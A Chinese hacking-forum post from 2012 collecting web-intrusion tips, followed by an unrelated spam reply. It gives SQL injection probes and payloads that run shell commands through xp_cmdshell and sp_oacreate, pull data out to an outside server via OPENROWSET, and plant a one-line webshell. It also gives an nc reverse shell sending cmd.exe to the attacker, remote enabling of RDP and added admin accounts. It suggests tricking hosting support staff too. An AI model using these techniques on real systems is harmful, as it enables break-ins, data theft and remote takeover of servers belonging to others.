找回密码
 立即注册
查看: 4301|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
: a2 l- u( q! q) x; Z7 I, b! U
2 O; y  C! n+ {0 V! B6 S+ _& R' X- f) T! k) ?7 ~7 Q
SA点数据库分离搞法+语句:; Z+ y8 ]6 W  ]0 @5 a$ P
2 z( V/ Z! V, P" L, u) v; e
注射点不显错,执行下面三条语句页面都返回正常。3 q" `' w2 X9 p: i
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
, r' o  E& {8 M  G$ L8 Iand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
% c1 X0 v+ i. @( [$ Fand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
+ G1 {5 O/ D. R4 n* E可以列目录,判断系统为2000,web与数据库分离
- X& ]* R& P. k* o8 c& K遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
1 E/ |7 I, c; ~( r# {* C) U在注射点上执行
. s. t$ w( N/ l# h+ zdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--  M3 m  S7 X0 {; t3 k' F  @
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP8 s  y9 k8 {8 a# ^
还有我用NC监听得其他端口都没有得到IP。  E+ k/ n4 d1 g
9 V9 ?3 J: r% |$ E  R6 M0 x. Q
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
: W6 p0 J( d; j'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
- S" `$ M. \: H4 [  O  H) c7 G% ]. X: E, ?) w( b% T# \. A
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--% D7 Y* D! x7 Z' i
+ M: V5 L- b8 @1 P  L
现在就猜想是不是数据库是内网而且不能连外网。
5 C0 d" A, U- Z) s8 O: T6 u$ e: ^% b( L. @% D

! }/ O3 i  L' d3 C, maccess导出txt文本代码
6 g9 D! W* j! S6 G. G. n0 q5 w& x5 USELECT * into [test.txt] in 'd:\web\' 'text;' from admin
/ a0 A# ~8 ~6 f
* b4 K# z  \: L2 e( G" l% q& [$ v* L* O7 }+ I! g4 M! X

; y. }. q$ q$ P  V' u自动跳转到指定网站代码头
2 k* Z/ Q2 c3 U+ Z<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>4 l1 k( D7 K8 G' F& {8 \' {
' A; Y! H  e( c7 Q4 n( W7 C, Q( }8 s

! F! T0 o$ @" a9 w9 e: c$ k入侵java or jsp站点时默认配置文件路径:8 [2 d* I4 q, [! n
\web-inf\web.xml
6 m3 [3 y2 m/ R' I% f* J7 Ctomcat下的配置文件位置:
, _% a& o: u  c) \3 I0 {) R\conf\server.xml            (前面加上tomcat路径)
# N% ]. L& ?3 h3 o5 Q6 }6 f\Tomcat 5.0\webapps\root\web-inf\struts-config.xml. G" t4 d1 D# i
  k8 g, \2 r: ?  j: V& w+ z# O
$ q  z; d/ J8 K5 W$ s
/ K. }, Y( x2 H, {$ @& X+ q
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
. f8 ]- X& S! w) t  n9 r2 [-1%23
1 R7 [7 Q  l  w5 b> 7 Q6 X" B- t  L
<
6 h- I6 x; u0 D- H4 C4 `& d1'+or+'1'='1
; r- c4 K- ?( J5 C3 v; Uid=8%bf4 Y7 t+ r2 Z/ H5 `3 ^' X

% _' K4 |0 n) i4 U8 b/ ]( X# Y6 T全新注入点检测试法:
- M/ Y# c8 L$ C* V3 Q在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
( r0 L& h7 ]" I" U5 B$ r5 f
* f$ p& i7 s! C2 x在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。+ [; g1 p& a) m5 Y1 L8 X

1 ^# ]" t" d- v% X( b搜索型注入判断方法:% k' S. J$ R8 t
北京%' and '1'='1' and '%'='4 A) F' s% E+ @$ C1 K5 {
北京%' and '1'='2' and '%'='
& o1 W9 f# }7 {3 M7 S) n- m$ S9 i0 P, ^4 F6 w8 @( p( R! F

, I" Y/ A( Y1 d1 [! sCOOKIES注入:
* j, i! k5 H- W) q& B, }& {  b
0 Q- M0 _  t: F; v: C# j( bjavascript:alert(document.cookie="id="+escape("51 and 1=1"));6 z. q; b1 K4 `
$ d/ K" T1 V% c- y
2000专业版查看本地登录用户命令:
" C* j- C/ X3 ~! ?, `' g, N; [net config workstation, `5 F8 B7 {# K+ N4 o

0 r0 s& w3 L+ K! |& G* C9 g/ X/ O# h1 D
2003下查看ipsec配置和默认防火墙配置命令:
* F! C5 ]4 j) @+ `& e, c( Znetsh firewall show config) ~* n! K2 [& _- F
netsh ipsec static show all9 y5 ?9 ~. ^; U0 |$ C  O
* r! Y! F& o) E/ U
不指派指定策略命令:: W; g6 U! y% N0 X& c! Y# u
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
" o0 ^$ [' b3 O: B$ [netsh ipsec static show policy all  显示策略名
( k& @. X5 q! O- X! a5 t. s) H( P0 a$ Q& v) R& c, ]: N

' B. j1 m3 p7 P7 L/ |% w' o. X猜管理员后台小技巧:
# s9 H* @5 M3 {) _) V( Jadmin/left.asp
8 f4 w6 L+ `8 U% w! [admin/main.asp
% p; i& d% {. \: Yadmin/top.asp
/ F4 d. A) N$ \) }; ^admin/admin.asp
+ c2 t* l; ^0 W' L5 X& W4 Z会现出菜单导航,然后迅雷下载全部链接4 U( V5 h' B- k4 k- m
, X2 L6 s4 p7 U5 S6 T4 f

: j+ s0 I/ Y- ?" g- I4 K+ C社会工程学:) _8 d8 W! B  ]* Y/ h
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
; n# \) H) e" ^8 w0 }, H2 H然后去骗客服
9 ^+ s8 [! n  ]6 A! d# T: _" d/ Y" @# R6 r- l

4 p# D; Q+ H3 M9 R, `" M3 N/ r' M! W1 z统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
3 H, A+ R6 Q# [: j查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
% s, P4 f  N2 W7 b- }8 a* y2 R  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。: P" h% x% @' V* \; n- x
# U! V; Q1 }6 I7 R  u; W8 Q

+ E1 q( r7 i. V. s% V8 p+ D: x; C; x6 L- }7 s) P7 \; N8 e' R7 m0 V
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
1 r* l8 }; t, Y$ k3 o  p  l- k
$ p8 {$ V; n. @: C7 A# e  x- c% ]  b2 d# P, L% @8 M! A5 P
( G8 t, N( F( Z! ~
CMD加密注册表位置
+ _9 w  ]; c& `' M' V$ R: c- m(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor9 G9 v3 c/ M$ X8 V+ t
AutoRun0 C: K8 T& W, Q

! ^2 v7 Z! d# a& K5 F, ^(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
# A0 b3 p& y$ {! u  g# k7 R: E0 ~' lAutoRun
0 Z1 Q7 y1 e+ i+ d2 f2 s/ N2 u/ J* S& p  m, U

$ u+ C8 x+ U& _- c在找注入时搜索Hidden,把他改成test, y1 d. V% M& ~: |4 n7 u, U, M3 V" u

: t7 O2 r5 J+ s; N; f
; i- x# m6 n1 O! G0 q9 e% p  G6 |5 J5 T3 s5 h2 q+ Q/ K7 v
mstsc /v:IP /console
3 x' r% s5 C" J* w; g( P6 {2 Q2 w+ A8 X$ F( ~
" U% L( r! O- @, B
一句话开3389:
5 H8 Q0 E1 U* w8 N, j6 {3 Y0 X
. d+ [- {+ W2 h; |9 p" l3 A最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  ; V: z! Z: }1 s/ b3 r  H6 f' ^) R2 @
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.4 f8 C9 Z' f9 k5 ~. D! r

* x0 C7 ^; H  L5 {5 B0 v0 ?; l% \* n0 T3 E8 _% ]
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:2 W  ]1 S: V1 K% b+ d6 f0 n8 S
Insert into admin(user,pwd) values('test','test')
6 k. z: k# ^- e  @5 }  k: }& I9 z9 }) v

# x) l' Z5 ~* I3 v; }9 k, `NC反弹7 _, D7 _$ @* V4 H1 r
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
, W3 Z% I$ x* \8 B# `& ~6 l然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
) `% n+ R2 W, g% a$ v2 x1 I* n; N9 W& \4 H# z
; g" |8 d7 v2 S; N! _, G
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题3 D2 }) r. V" L; d

/ k- L  [6 u& Y4 [有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
- j5 L9 H! i3 E% |2 p例如:# ~5 Q5 |- A8 ?; W% x# l
subst k: d:\www\ 用d盘www目录替代k盘; {% j5 N8 v7 k/ @3 F1 G
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表